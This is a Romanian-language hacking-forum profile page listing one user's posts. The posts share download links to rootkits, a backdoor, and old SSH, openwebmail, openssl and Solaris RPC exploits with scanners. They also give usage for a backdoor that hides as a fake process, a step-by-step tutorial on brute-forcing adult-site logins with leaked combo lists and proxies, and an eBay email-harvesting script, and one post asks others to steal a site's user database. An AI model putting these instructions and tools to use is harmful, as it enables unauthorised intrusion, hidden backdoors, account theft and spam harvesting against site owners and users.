Jump to content

cain2k

Members
 View Profile  See their activity

  • Posts

    21

  • Joined

  • Last visited

 Content Type 

Everything posted by cain2k

  1. cain2k
    scannerul e facut de mine ... care-i problema ta . Exploitul nu-i. Scannerul foloseste pscan2 si grabbb. Scriptul l-am facut io.
  2. cain2k
    sparge situl asta http://www.tram-pararam.com ... adica ia baza de date cu useri si pass ... dar sa zici cum faci .. :@ Take Care ! Edit Nemessis: Nu mai cereti sa se sparga site-uri sau orice altceva aici pe forum. Vrei sa o faci fa-o singur.
  3. cain2k
    mozi ... asta nu trebe compilat ... este in perl ... doar ./get.pl . LOL. Pai da normal ca ia doar e-mails din descriere , dar asa vezi care-s aia care liciteaza.
  4. cain2k
    Ai citit din ce am scris ceva .. Se dezarhiveaza ala 3.tgz ... in el sunt 2 fisiere si un dir get.pl si inca filtru.sh Se editeaza get.pl ... se scrie Start BID si end BID ... ala cu start trebe sa nu aiba # la inceput. Si il lasi sa mearga ... In dir ebay o sa-tzi faca un fisier final.txt ... acolo nu intelegi mare lucru. Dar am pus si un fisier extractor.exe ... acolo bagi textul din final.txt ... si ii dai extract ... ce e-mails vrei tu ... GOT IT ???
  5. cain2k
    Vezi daca ai pe root nc ( netcat) ... prin el face call back. Si de asemenea, daca e serverul patch ... nu mere ... :@
  6. cain2k
    rootkit, patch de diferite exploituri remote ... http://rapidshare.com/files/2879185/srk.tar
  7. cain2k
    openwebmail scanner si exploit ... itzi da id de openwebmail ... si daca ai local root exploit.... devii root http://rapidshare.com/files/2878907/open.tgz
  8. cain2k
    un scanner de openssl ... mai vechi oleaca ... facut de mine http://rapidshare.com/files/2878836/aopen.tgz
  9. cain2k
    Nu-i facut de mine ... de un prieten din UMH ... http://rapidshare.com/files/2877677/cxkit.tar.html
  10. cain2k
    DA ? ... obtii drept de root ... pe un solaris ... si daca nu ai rk bun de solaris ... si program pt el ... stai si te uitzi ce frumos este ... .. a chiar .. o sa pun un rk de solaris ..
  11. cain2k

    rk simplu

    cain2k replied to cain2k's topic in Exploituri

    oricum ... linkul de pe rapidshare.ro nu mai merge .. god knows why .. asa ca l-am pus pe rapidshare.com
  12. cain2k
    ce zice el acolo cu faci aia si da-i click si push aia ... mergea prin 2000 ... Mai simplu folosesti un port scanner si gata ... si daca te intereseaza ce ruleaza pe http ... exista http://www.netcraft.com . Iar faza cu cart32.exe ... OLD ... versiunile vechi aveau o parola implicita ... parca "wemilo" ... si exista si un decrpiter de parola .. dar acu CHIAR daca reusesti sa dl cart32.ini ... este altfel criptat .. si nu am vazut pana acu decripter pentru el ... ca sa aflii parola de admin ... asa ca ... GOD !!! ... OLD !!!
  13. cain2k

    rk simplu

    cain2k posted a topic in Exploituri

    Un rk folosit de mine pt RH 6.x pana la FC 3. Este simplu si mai mult un backdoor decat rootkit NU ARE e-mail !!! Se foloseste : ./all parola port fisier Parola = parola de logare, userul este root Port = pe ce port sa ruleze backdoorul Fisier = cum sa apara la ps ax daemonul. Nu apare ca executabil, ci ca serviciul -q . Gen /usr/bin/bashx. Exemplu : ./all alupigus 31337 /usr/sbin/daemon La ps ax sau socklist va apare /usr/sbin/daemon -q Este destul de vechi si nu stiu daca mai este valabil ... oricum ... merita incercat :@ http://rapidshare.com/files/2873999/rk.tgz.html
  14. cain2k
    Un exploit mai vechi pentru SSHD, respectiv serviciul ce ruleaza pe port 22. http://rapidshare.com/files/2874333/assh.tgz Scannerul este facut de mine ... Foloseste pscan si grabbb ... Have fun !!!
  15. cain2k
    Un scanner si exploit mai vechi. Scriptul este facut de mine ... asa ca ... Don`t expect much !!! http://rapidshare.com/files/2874164/asun.tgz Scaneaza pt portul 111 si testeaza de rpc.cachefsd si rpc.cmdsol. Exploiturile aferente sunt in aceeasi arhiva
  16. cain2k
    Salut, O sa scriu in acest tutorial despre cum se poate "ghici" prin bruteforce parolele de la situri XXX... Unelte necesare : C-Force Charon'>http://carpetboy.deny.de/CFb.zip Charon Z-leecher'>http://www.project2025.com/Charon.zip Z-leecher Raptor'>http://beda.securibox.net/files/Z-Leecher.zip Raptor 3 Proxygrab'>http://madmax.deny.de/downloads/raptor.zip Proxygrab Optional'>http://proxygrab.msk.ru/download.php?file=proxygrab.v0.6.rar Optional : Staph ...mult timp si rabdare Acest tutorial se ocupa de siturile care au basic autentification, deci nu OCR protection ( cele care iti cer sa introduci un sir de caractere cand vrei sa te loghezi) I. Cum sa faci un wordlist bun. Wordlistul este un fisier ce contine diferite combos, adica user:pass. Acestea pot fi obtinute cel mai bine de pe forumuri dedicate parolelor XXX. Pentru a gasi acest fel de forumuri folositi Google. Pagini gen http://www.ultrapasswords.com si altele. II. Leeche combos. Folosind programul Z-leecher scoti din fisierele *.txt sau de pe paginile web gasite cu parole , combourile. Cu cat mai multe combos si mai recente, cu atat mai bine. ( eu am o lista cu 40000 combos ). Pentru a nu avea duplicates in wordlist, se foloseste programul Raptor 3 si se remove duplicates. III. Proxys. Cu programul proxygrab leech pagini care dau zilnic un numar de proxy-uri. Pentru aceasta trebuie sa gasiti o lista cu pagini ce ofera zilnic proxyuri, cat si forumuri dedicate proxyurilor. IV. Testing ... Dupa ce gasim proxys, ele trebuie verificate. Pentru aceasta folosim programul Charon. Aici se incarca lista cu proxys, se elimina duplicates si dupes, si se testeaza proxyurile. V. Alegerea sitului XXX . Se alege un site http://www.xxx.com. Incercam sa facem un cont pe acest site si vedem daca se poate alege user si pass. Ca sa fie mai simplu, cautam sa facem cont "platind" prin Check. Acolo dati info false si cand cere user si pass dati user de un caracter, gen a, si pass tot de un caracter, gen b. Vezi primi o eroare si vi se v-a zice cate caractere trebuie MINIM sa aiba userul si parola, si eventual si maxim. Daca situl nu v-a lasa sa alegeti user si parola , nu merge varianta bruteforce. Gasiti altul. De asemena situl trebuie sa v-a ceara user si pass intr-o casuta atunci cand click pe Members. VI. Bruteforcing propriuzis. Pornim programul C-Force. Aici la fereastra Auto scriem la Url: pagina membrilor, gen http://www.xxx.com/members sau http://www.xxx.com/members/index.htm , sau whatever. La proxy list incarcam lista cu proxys gasite si la Combo-list lista cu combos leeched cu Z-leecher. Apasam pe fereastra Setting. Aici bifam User combo lenght filter si introducem info aflata cand am vrut sa facem cont pe site, adica lungimea userului si parolei . Apasam din nou pe fereastra Auto si click START ... good luck !!! P.S: acest tutorial a fost facut cu caracter INFORMATIV !!! ... dupa aprox o luna de cracking, bruteforce ... whatever ...Cititi de asemenea tutoriale si info despre fiecare tool in parte, daca aveti intrebari .
  17. cain2k
    Well ... la Scam nu mergea ca acolo se pune pagini ....
  18. cain2k
    Am mai demult un script ce ruleaza pe linux , ce colecteaza e-mailuri REALE de pe serverul eBay ... daca e cineva interesat de asa ceva ( il am de vre-o 2-3 ani) sa zica aci si il upload pe undeva ... Take Care !!! P.S: fisierele se gasest la http://rapidshare.com/files/2874410/3.tgz . Trebuie doar editate Start BID si End BID din fisierul get.pl P.P.S: cu programul http://rapidshare.com/files/2874479/extractor.zip se extrag DOAR e-mailurile din fisierul generat de get.pl
×
×
  • Create New...